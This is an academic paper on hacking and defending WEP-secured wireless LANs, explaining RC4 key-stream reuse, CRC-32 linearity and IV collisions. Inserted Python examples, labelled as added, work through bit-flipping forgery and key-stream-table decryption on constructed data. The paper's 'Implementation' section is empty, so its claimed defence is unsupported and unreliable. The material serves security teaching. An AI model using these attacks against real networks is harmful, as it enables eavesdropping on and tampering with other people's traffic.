Vol 2 | Issue 3 | Spring Edition | DOI : February 2014 | Pp 353-356 | ISSN 2279 0381
Hacking And Defending In Wireless Networks
A.S.Syed Navaz *a, K.Girija b
a Asst. Professor, Department of Computer Applications, Muthayammal College of Arts & Science, Namakkal, Tamilnadu, India
b Student, Department of Computer Applications, Muthayammal College of Arts & Science, Namakkal, Tamilnadu, India
* email Id: a.s.syednawaz@gmail.com
353 www.indiasciencetech.com
Keywords: Wireless, LAN, Attacks, Security, WLAN.
Abstract: This paper is an up-to-date look at various problems inherent in today's wireless networks from a user's as well as an administrator's point of view. The wireless medium makes eavesdropping a major threat, interference a problem, and the interception of transmissions easier than on wired networks. Several security problems and threats are exposed in detail, along with descriptions of how to exploit them. The paper concludes with a look at guidelines for ensuring the security of these networks and preventing the attacks described in this paper.
Introduction
In today's fast-changing world, management of information is the key to corporate success. This goes hand in hand with communication infrastructure. Of late there has been tremendous growth in wireless LAN usage, a growth that many compare to that of the Internet in the 1990s.
Access to a wired LAN is governed by access to an Ethernet port for that LAN. Therefore, access control for a wired LAN is often viewed in terms of physical access to LAN ports. Similarly, because data transmitted on a wired LAN is directed to a particular destination, privacy cannot be compromised unless someone uses specialized equipment to intercept transmissions on their way to their destination. In short, a security breach on a wired LAN normally requires that the LAN be physically compromised. With a wireless LAN (WLAN), transmitted data is broadcast over the air using radio waves, so it can be received by any WLAN client in the area served by the transmitter. Because radio waves travel through ceilings, floors, and walls, transmitted data may reach unintended recipients on different floors and even outside the building of the transmitter. Installing a WLAN can be like putting Ethernet ports everywhere, including your parking lot. Data privacy is therefore a genuine concern with wireless LANs, because there is no way to direct a WLAN transmission to only one recipient.
Wireless Encryption WEP Setup:
The 802.11 standard describes the communication that occurs in wireless local area networks (LANs). The Wired Equivalent Privacy (WEP) algorithm is used to protect wireless networks from unauthorized access; this function is not an explicit goal of the 802.11 standard, but it is frequently considered to be a feature of WEP.

WEP relies on a secret key that is shared between mobile stations (e.g. a laptop with a wireless Ethernet card) and an access point (i.e. a base station). The secret key is used to encrypt packets before they are transmitted, and an integrity check is used to ensure that packets are not modified in transit. The standard does not discuss how the shared key is established. In practice, most installations use a single key that is shared between all mobile stations and access points. More sophisticated key management techniques can help defend against the attacks we describe; however, no commercial system we are aware of has mechanisms to support such techniques.
Fig. 1 Encrypted WEP frame
Basic Encryption Mechanism
Journal of NanoScience and NanoTechnology | Vol 2 | Issue 3 | Spring Edition | ISSN 2279 0381
The RC4 algorithm generates a key stream (a long sequence of pseudorandom bytes) as a function of the IV v and the secret key k. This key stream is denoted by RC4(v, k). The plaintext P is then exclusive-ored (XOR) with the key stream to obtain the ciphertext C:

C = P ⊕ RC4(v, k)

Decryption:

It is the simple reverse operation at the recipient's end:

P' = C ⊕ RC4(v, k)
   = (P ⊕ RC4(v, k)) ⊕ RC4(v, k)
   = P
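As an added worked example (not code from the paper), the mechanism above in Python: RC4 keyed with the IV prepended to the shared secret k, the CRC-32 integrity check value appended to P before encryption, and the IV transmitted in the clear in front of the ciphertext. The key, IV and message are constructed sample values; the 40-bit key length and the little-endian encoding of the ICV are assumptions about the frame layout made for this example, not details the paper states.

```python
import struct
import zlib
from typing import Tuple

# Added example, not the paper's code: a minimal WEP encryptor/decryptor.
# Assumptions: 40-bit key, 24-bit IV prepended to the key (IV || k) to form the
# RC4 key, ICV = CRC-32 of the plaintext (little-endian) appended before encryption.


def rc4_keystream(key: bytes, length: int) -> bytes:
    """RC4: key-scheduling (KSA) followed by the pseudo-random generation loop (PRGA)."""
    S = list(range(256))
    j = 0
    for i in range(256):                      # KSA: permute S under the key
        j = (j + S[i] + key[i % len(key)]) & 0xFF
        S[i], S[j] = S[j], S[i]
    out = bytearray()
    i = j = 0
    for _ in range(length):                   # PRGA: one key-stream byte per step
        i = (i + 1) & 0xFF
        j = (j + S[i]) & 0xFF
        S[i], S[j] = S[j], S[i]
        out.append(S[(S[i] + S[j]) & 0xFF])
    return bytes(out)


def xor(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))


def icv(plaintext: bytes) -> bytes:
    """Integrity check value: CRC-32 over the plaintext, packed little-endian."""
    return struct.pack("<I", zlib.crc32(plaintext) & 0xFFFFFFFF)


def wep_encrypt(key: bytes, iv: bytes, plaintext: bytes) -> bytes:
    """Frame = IV || (P || ICV(P)) XOR RC4(IV || key); the IV travels unencrypted."""
    if len(iv) != 3:
        raise ValueError("WEP IV is 24 bits")
    body = plaintext + icv(plaintext)
    keystream = rc4_keystream(iv + key, len(body))   # RC4(v, k) in the paper's notation
    return iv + xor(body, keystream)


def wep_decrypt(key: bytes, frame: bytes) -> Tuple[bytes, bool]:
    """Strip the IV, XOR with the same key stream, and report whether the ICV matches."""
    iv, c = frame[:3], frame[3:]
    body = xor(c, rc4_keystream(iv + key, len(c)))
    plaintext, tag = body[:-4], body[-4:]
    return plaintext, icv(plaintext) == tag


# Constructed sample values (not from any real capture).
KEY = bytes.fromhex("0102030405")      # 40-bit shared secret k
IV = bytes.fromhex("0a0b0c")           # 24-bit v, chosen per packet by the sender
MSG = b"GET /index.html HTTP/1.0\r\n"

if __name__ == "__main__":
    frame = wep_encrypt(KEY, IV, MSG)
    print("frame   :", frame.hex())
    print("decrypt :", wep_decrypt(KEY, frame))
    # A flipped ciphertext bit is caught here only because the ICV was left untouched.
    bad = bytearray(frame)
    bad[3] ^= 0x01
    print("tampered:", wep_decrypt(KEY, bytes(bad)))
```

Running the file prints the frame, the successful decryption, and a tampered frame that fails the ICV check. The RC4 core can be checked against the standard known-answer value: the key "Key" produces the key stream EB 9F 77 81 B7 34 CA 72 ....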
Fig. 2 Gap Between Wep and Others
The following two sections describe the
problem in the algorithm and the technical details
of the attacks.
Problems
WEP uses the RC4 encryption algorithm, which is a stream cipher. A stream cipher operates by expanding a short key into an infinite pseudorandom key stream. The sender XORs the key stream with the plaintext to produce the ciphertext; XOR-ing the key stream with the ciphertext yields the original plaintext.
Fig. 3 RC4 Stream Cipher
This mode of operation makes stream ciphers vulnerable to several attacks. If an attacker flips a bit in a ciphertext, then upon decryption the corresponding bit in the plaintext will be flipped. Statistical attacks become increasingly practical as more ciphertexts that use the same key stream are known. Once one of the plaintexts becomes known, it is trivial to recover all of the others.
WEP has defenses against both of these attacks. To ensure that a packet has not been modified in transit, it uses an integrity check (IC) field in the packet. To avoid encrypting two packets with the same key stream, the initialization vector (IV) is combined with the shared secret to produce a different RC4 key for each packet; the IV is also included in the packet. However, both of these measures are implemented incorrectly, resulting in poor security. The integrity check field is implemented as a CRC-32 checksum, which is part of the encrypted payload of the packet. CRC-32 is linear, which means it is possible to compute the bit difference of two CRCs from the bit difference of the messages over which they are taken. In other words, bit flips carry through after RC4 decryption, which allows an attacker to flip arbitrary bits in an encrypted message and correctly adjust the checksum so that the resulting message appears valid.
The initialization vector in WEP is a 24-bit field, which is sent in the clear-text part of the message. Such a small space of initialization vectors guarantees the reuse of the same key stream. A busy access point that constantly sends 1500-byte packets at 11 Mbps will exhaust the space of IVs after 2^24 × 1500 × 8 / (11 × 10^6) ≈ 18,300 seconds, or about 5 hours. (The time may be even shorter, since many packets are smaller than 1500 bytes.) This allows an attacker to collect two ciphertexts that are encrypted with the same key stream. When the same key is used by all mobile stations, there are even more chances of IV collision.
For example, a common wireless card from Lucent resets the IV to 0 each time the card is initialized, and increments the IV by 1 with each packet. This means that two cards inserted at roughly the same time will provide an abundance of IV collisions for an attacker. Worse still, the 802.11 standard specifies that changing the IV with each packet is optional.
Attacks
Passive Attack to Decrypt Traffic
The first attack follows directly from the above observation. A passive eavesdropper can intercept all wireless traffic until an IV collision occurs. By XOR-ing two packets that use the same IV, the attacker obtains the XOR of the two plaintext messages. The resulting XOR can be used to infer data about the contents of the messages. Further
educated guesses about the contents of one or both of the messages can be used to statistically reduce the space of possible messages, and in some cases it is possible to determine the exact contents.

With only a small factor in the amount of time necessary, it is possible to recover a modest number of messages encrypted with the same key stream, and the success rate of statistical analysis grows quickly. Once it is possible to recover the entire plaintext for one of the messages, the plaintext of all the others with the same IV follows directly, since all the pairwise XORs are known.

An extension to this attack uses a host somewhere on the Internet to send traffic from the outside to a host on the wireless network installation. Because the attacker chooses that traffic, its plaintext is known to him.
Fig. 4 Idea of Key recovery Attack
Active Attack to inject traffic
The following attack is also a direct consequence of the problems described in the previous section. The procedure involves constructing a new message, calculating its CRC-32, and performing bit flips on the original encrypted message to change the plaintext to the new message. The basic property used is that if C = X ⊕ RC4(v, k) is the encryption of X, then C ⊕ (X ⊕ Y) = Y ⊕ RC4(v, k), which is the valid encryption of Y. This packet can now be sent to the access point or mobile station, and it will be accepted as a valid packet.

A slight modification to this attack makes it much more insidious. Even without complete knowledge of the packet, it is possible to flip selected bits in a message and successfully adjust the encrypted CRC (as described in the previous section) to obtain a correct encrypted version of a modified packet. For example, it is possible to alter commands being sent to a shell over a telnet session, or interactions with a file server.
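An added example (not from the paper) of the forgery just described, written so that the attacker's side of the code touches only the ciphertext. The function `keystream()` is a deterministic stand-in for RC4(v, k) built from SHAKE-256; it is an assumption of this example and not WEP's cipher, and that is deliberate: the forgery depends only on the stream-cipher XOR and on CRC-32 being affine over XOR, so it works unchanged against any stream cipher paired with a CRC integrity check. The key, IV and the telnet command are constructed values.

```python
import hashlib
import struct
import zlib
from typing import Tuple

# Added example, not the paper's code: forging a WEP frame through the linear
# CRC-32 ICV. The attacker-side functions (icv_delta, flip_to, forge) never see
# the key or the key stream. keystream() is a stand-in for RC4(v, k), an
# assumption of this example; the forgery works against any stream cipher.


def xor(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))


def icv(p: bytes) -> bytes:
    """WEP integrity check value: CRC-32 of the plaintext, little-endian."""
    return struct.pack("<I", zlib.crc32(p) & 0xFFFFFFFF)


def keystream(iv: bytes, key: bytes, n: int) -> bytes:
    """Stand-in for RC4(v, k): deterministic in (IV, key). Not WEP's real cipher."""
    return hashlib.shake_256(iv + key).digest(n)


def encrypt_body(iv: bytes, key: bytes, p: bytes) -> bytes:
    """Sender: C = (P || ICV(P)) XOR RC4(v, k). The IV itself travels in the clear."""
    body = p + icv(p)
    return xor(body, keystream(iv, key, len(body)))


def decrypt_body(iv: bytes, key: bytes, c: bytes) -> Tuple[bytes, bool]:
    """Receiver: recover P' and report whether its ICV matches (accept only if True)."""
    body = xor(c, keystream(iv, key, len(c)))
    p, tag = body[:-4], body[-4:]
    return p, icv(p) == tag


def icv_delta(delta: bytes) -> bytes:
    """CRC-32 is affine over XOR: crc(P ^ D) = crc(P) ^ crc(D) ^ crc(0^n) for equal
    lengths n, so the change the ICV needs for D is computable without knowing P."""
    zeros = bytes(len(delta))
    return struct.pack("<I", (zlib.crc32(delta) ^ zlib.crc32(zeros)) & 0xFFFFFFFF)


def flip_to(guess: bytes, wanted: bytes, offset: int, plaintext_len: int) -> bytes:
    """Difference D that turns the bytes the attacker guesses at `offset` into `wanted`."""
    d = bytearray(plaintext_len)
    d[offset:offset + len(wanted)] = xor(guess, wanted)
    return bytes(d)


def forge(c: bytes, delta: bytes) -> bytes:
    """Attacker: C XOR (D || ICVdelta(D)) decrypts to P XOR D carrying a valid ICV."""
    if len(delta) != len(c) - 4:
        raise ValueError("delta must span the plaintext part of the body")
    return xor(c, delta + icv_delta(delta))


# Constructed values (no real capture): a telnet command typed by the victim.
KEY = bytes.fromhex("0102030405")
IV = bytes.fromhex("000001")
P = b"cp secret.txt /tmp/\r\n"
C = encrypt_body(IV, KEY, P)


def attack() -> Tuple[bytes, bool]:
    """Knowing only that the command starts with 'cp', rewrite it in flight to 'rm'."""
    delta = flip_to(b"cp", b"rm", 0, len(C) - 4)
    return decrypt_body(IV, KEY, forge(C, delta))


if __name__ == "__main__":
    print(attack())                                  # (b'rm secret.txt /tmp/\r\n', True)
    # Flipping the same bits without fixing the ICV: text changes, but the check fails.
    naive = xor(C, flip_to(b"cp", b"rm", 0, len(C) - 4) + bytes(4))
    print(decrypt_body(IV, KEY, naive))
```

The attacker needs neither the key, the key stream, nor the rest of the command; a correct guess about two bytes at a known offset is enough, and the receiver cannot distinguish the forged frame from a genuine one.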
Active Attack from Both Ends
The previous attack can be extended to decrypt arbitrary traffic. In this case, the attacker makes a guess not about the contents but rather about the headers of a packet. This information is usually quite easy to obtain or guess; in particular, all that is necessary to guess is the destination IP address. Most wireless installations have Internet connectivity, so the attacker uses the bit-flipping technique above to rewrite the destination IP address to a machine he controls: the packet will be decrypted by the access point and forwarded unencrypted through the appropriate gateways and routers to the attacker's machine, revealing the plaintext. If a guess can be made about the TCP headers of the packet, it may even be possible to change the destination port of the packet to port 80, which will allow it to be forwarded through most firewalls.
Table based attacks
The small space of possible initialization vectors allows an attacker to build a decryption table. Once he learns the plaintext for some packet, he can compute the RC4 key stream for that packet's IV and use it to decrypt every other packet that uses the same IV. Over time, perhaps using the techniques above, the attacker can build up a table of IVs and corresponding key streams. This table requires a fairly small amount of storage (~15 GB in practice; an upper bound is 2^24 IVs × 1500 bytes of key stream ≈ 25 GB). Once it is built, the attacker can decrypt every packet that is sent over the wireless link.
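An added example (not the paper's code) that covers both the passive attack on IV collisions described earlier and the decryption table described here. As in the forgery example, `keystream()` is a SHAKE-256 stand-in for RC4(v, k) and is an assumption of this example; the only property used is that a repeated IV yields an identical key stream. The crib is real: every IPv4 data frame in an 802.11 network begins with the fixed 8-byte LLC/SNAP header AA AA 03 00 00 00 08 00, so guessing those bytes is the "educated guess" the text refers to. The key, IV and packet contents are constructed.

```python
import hashlib
from typing import Dict, Optional

# Added example, not the paper's code: what key-stream reuse hands a passive
# attacker, and how recovered key streams become a decryption table keyed by IV.
# keystream() is a stand-in for RC4(v, k) (assumption of this example); the only
# property used is that a repeated IV yields the same key stream.

# Fixed LLC/SNAP header that opens every IPv4 data frame: a reliable crib.
LLC_SNAP_IPV4 = bytes.fromhex("aaaa030000000800")


def xor(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))


def keystream(iv: bytes, key: bytes, n: int) -> bytes:
    """Stand-in for RC4(v, k): the same (IV, key) always gives the same bytes."""
    return hashlib.shake_256(iv + key).digest(n)


def wep_frame(iv: bytes, key: bytes, p: bytes) -> bytes:
    """IV in the clear, then P XOR key stream (the ICV plays no role here, so it is left out)."""
    return iv + xor(p, keystream(iv, key, len(p)))


def xor_of_plaintexts(f1: bytes, f2: bytes) -> bytes:
    """Two frames under one IV: C1 XOR C2 = P1 XOR P2, the key stream cancels out."""
    if f1[:3] != f2[:3]:
        raise ValueError("the two frames must share an IV")
    return xor(f1[3:], f2[3:])


class KeystreamTable:
    """IV -> longest recovered key-stream prefix for that IV."""

    def __init__(self) -> None:
        self.table: Dict[bytes, bytes] = {}

    def learn(self, frame: bytes, known_plaintext: bytes) -> int:
        """Known or guessed plaintext reveals key stream: RC4(v, k) = C XOR P."""
        iv = frame[:3]
        ks = xor(frame[3:], known_plaintext)
        if len(ks) > len(self.table.get(iv, b"")):
            self.table[iv] = ks
        return len(self.table[iv])

    def decrypt(self, frame: bytes) -> Optional[bytes]:
        """Decrypt as many bytes of the frame as the table knows for its IV."""
        ks = self.table.get(frame[:3])
        return None if ks is None else xor(frame[3:], ks)


# Constructed scenario: a card that reset its IV to 0 sends a login under IV 000000;
# the attacker has also sent a packet of his own to that station from the Internet.
KEY = bytes.fromhex("0102030405")
IV0 = bytes(3)
P_VICTIM = LLC_SNAP_IPV4 + b"USER alice\r\nPASS hunter2\r\n"
P_INJECTED = LLC_SNAP_IPV4 + b"attacker-chosen payload, known byte for byte"
F_VICTIM = wep_frame(IV0, KEY, P_VICTIM)
F_INJECTED = wep_frame(IV0, KEY, P_INJECTED)


def passive_attack() -> Dict[str, Optional[bytes]]:
    table = KeystreamTable()
    # 1. XOR of two ciphertexts under one IV leaks P1 XOR P2 with no key material at all.
    p1_xor_p2 = xor_of_plaintexts(F_VICTIM, F_INJECTED)
    # 2. The LLC/SNAP guess alone yields 8 key-stream bytes, and with them the first
    #    8 plaintext bytes of every frame sent under this IV.
    table.learn(F_VICTIM, LLC_SNAP_IPV4)
    after_crib = table.decrypt(F_INJECTED)
    # 3. A fully known plaintext (the injected packet) yields the whole key stream,
    #    which then decrypts the victim's frame outright.
    table.learn(F_INJECTED, P_INJECTED)
    after_known = table.decrypt(F_VICTIM)
    return {"p1_xor_p2": p1_xor_p2, "after_crib": after_crib, "after_known": after_known}


if __name__ == "__main__":
    for name, value in passive_attack().items():
        print(name, value)
```

The first eight bytes of `p1_xor_p2` are zero because both frames carry the same LLC/SNAP header, which is exactly what makes the header such a useful crib: it confirms the IV collision and hands over the first eight key-stream bytes for free. The table only ever grows, and in a real attack each IV entry would be filled in from whichever packet under that IV the attacker learns the plaintext of first.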
Implementation
Fig. 5 Our Contributions
Conclusion
It is quite simple: use Wired Equivalent Privacy (WEP), but do not rely on it. Yes, it can be cracked; the attacks described here need hours of captured traffic, and key recovery attacks based on weak IVs need considerably less. Wireless networks using the 802.11b protocol are at present inherently
insecure and vulnerable to a variety of attacks. Using a laptop with a Wi-Fi card and the right software, an attacker is capable of immense mischief and in theory could be as far as 20 miles away in a safe haven. The implementation proposed here is simple: it limits the weak IVs, which slows down an attacker and provides better security for wireless networks.